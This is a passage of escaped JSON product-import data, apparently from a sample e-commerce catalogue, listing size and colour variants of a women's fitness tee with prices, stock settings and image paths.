Tee-S-Blue\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1450\":{\"sku\":\"WS09-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-S-Red\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1451\":{\"sku\":\"WS09-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-S-White\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1452\":{\"sku\":\"WS09-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-M-Blue\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1453\":{\"sku\":\"WS09-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-M-Red\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1454\":{\"sku\":\"WS09-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-M-White\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1455\":{\"sku\":\"WS09-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-L-Blue\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"image\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1456\":{\"sku\":\"WS09-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-L-Red\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1457\":{\"sku\":\"WS09-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Tiffany Fitness Tee-L-White\",\"description\":\"<p>You\'ll work out and look cute doing it in the short-sleeve Tiffany Fitness Tee. The longer length and fitted cut offer a smoother silhouette, while scoop neck pattern and drape effects lend a trendy touch.<\\/p>\\n<p>&bull; Teal soft scoop neck tee.<br \\/>&bull; Contrast stitching pattern. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tiffany-fitness-tee-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_